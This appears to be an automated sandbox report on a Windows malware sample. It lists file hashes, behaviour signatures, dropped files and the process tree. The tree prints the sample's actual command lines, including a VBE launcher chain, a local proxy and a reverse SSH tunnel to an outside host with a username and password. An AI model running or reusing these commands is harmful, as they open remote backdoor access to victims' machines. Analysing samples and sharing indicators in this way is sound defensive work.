Analysis

  • max time kernel
    77s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/12/2022, 23:57

General

  • Target

    bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe

  • Size

    289KB

  • MD5

    356682a0be072f6e5c12a796f16ea805

  • SHA1

    4b7df88263931fe8ee62564034dbcd8bd23f19f4

  • SHA256

    bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d

  • SHA512

    547e87ed6d4204bd45ffca9fe4f8fe73938cd8f5f6aa2d2fdf7f2fb113e7ae933c4c1b023fc08d739e99baebfe3bc3d5381ab16019ab9b3147482e6b21537504

  • SSDEEP

    6144:527gCbTehEqclWYacoztvRMFv4fYQdFLMmnyzf1Z4H2QqAlggvYSiC9if:527/bTehEqclrytve54fYIMAyzf1ZBAy

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe
    "C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Data.msi\startup.vbe"
      2⤵
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Data.msi\alg.vbe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Data.msi\cssrs.exe
          "C:\Data.msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
          4⤵
          • Executes dropped EXE
          PID:1764
        • C:\Data.msi\System.exe
          "C:\Data.msi\System.exe" -ssh -R 16641:127.0.0.1:2103 elenor1.ath.cx -l linux -pw 2n3055
          4⤵
          • Executes dropped EXE
          PID:272
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1608

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Data.msi\DiskDoctor.lnk

    Filesize

    459B

    MD5

    8f5d6310e7fcf52fcb7509930ff14813

    SHA1

    198e6182d515a46167c0193d4d8c0fd985bf3185

    SHA256

    322d1f912491ab13e5362c4e8487cba773d8cde08c35ff518c9a882979204217

    SHA512

    be491e3fa3c99525b1116b328b1ccd9d45611a6e42961ee8649ee6261713f8c07f5906bad1e7c0552f6bf9e2f6c6f9db4be15c3067f6f1dd96e6aefcbbdb05ff

  • C:\Data.msi\System.exe

    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

  • C:\Data.msi\alg.vbe

    Filesize

    1KB

    MD5

    039c9b2c45642603aac8dc7c0999b2d7

    SHA1

    57038a7e45b8036c11d143b30153aaa69807aebf

    SHA256

    64d3282227598b86413632dd8bf8a1588c06c834fa4984900934d3dca7d99e12

    SHA512

    bbabd6af0be61ab989747b56b84ee55739e2993fe9f80017163b1b262be74d63825603fa6fc2797efb2e73fed65118e30a8f01e824226d3b523d2da6350db4a6

  • C:\Data.msi\cssrs.exe

    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

  • C:\Data.msi\pic.url

    Filesize

    138B

    MD5

    49efe6d104d450d71d2ee7c513845e83

    SHA1

    ac8423b7ea4d7d7e27b67f3c6de03244dbfd5814

    SHA256

    8f9692895b703948cfddfd5160911c214a4ee53c219175fa12afeaef8214997f

    SHA512

    dffc2ac38d1602b31128acd1d3f6f75f9e03c7c481febf8397b52d385b68d6a919ff1f6584941530cf9f80734cba0273d489cc74e50b24dc2eaa2ff7ac905503

  • C:\Data.msi\startup.vbe

    Filesize

    89B

    MD5

    27ebf479041e67364f960426655bb757

    SHA1

    1dcb48a9f8cbb99439262e06247eb830a519d74c

    SHA256

    e3964b6925d9dc1e1d74715992dd112bd9db960bf4c1c5af0324d0b2cf4f82eb

    SHA512

    c59ef8dc0f74f6e643306c35246436e31f60dc4ac158b12bdfe1dbdc7a40038e252dbaebecdfcf293792723cefa5f55f33cfe44b484f3d281d4876f260ee8197

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    340B

    MD5

    58ed47c5c1e3fa9f83f6502d46a6ad4a

    SHA1

    cee05360aee890b099266ff78fb5a95c1ffff315

    SHA256

    06767c1ab56f0ca8f3760a7383d829324fa5a83a6021080bb21c3e54e41bc2b9

    SHA512

    8c98a61aef83bf7c078cc53e0a7e1139b5ac10e6e41ea0019ad248d173ee539eb0369a957e57178565211768c46131d68edd4313aaab707c8269461527b47213

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IBB285WI.txt

    Filesize

    601B

    MD5

    f594610d32ac3072d0f7774f7a3e6693

    SHA1

    b6a6c9206885f7e9a630a9009d4d89e99d0da5d8

    SHA256

    8066600d39075ecf59be19f6a19db66ae89ef7dd207bd97c871bed9b27eb0488

    SHA512

    d7bc15b47137fc671764cb98602ea8a6ed03c150f965cd14d3f0cc1640ee31d6b150e6f16d564f7b80683531a805f591a00632c0ee68b73645b1f928dc751f38

  • \Data.msi\System.exe

    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

  • \Data.msi\cssrs.exe

    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

  • memory/272-79-0x0000000000400000-0x000000000045C000-memory.dmp

    Filesize

    368KB

  • memory/888-75-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

  • memory/888-76-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

  • memory/888-78-0x0000000002D20000-0x0000000002D7C000-memory.dmp

    Filesize

    368KB

  • memory/888-80-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

  • memory/1504-54-0x00000000768A1000-0x00000000768A3000-memory.dmp

    Filesize

    8KB

  • memory/1764-77-0x0000000000400000-0x0000000000425000-memory.dmp

    Filesize

    148KB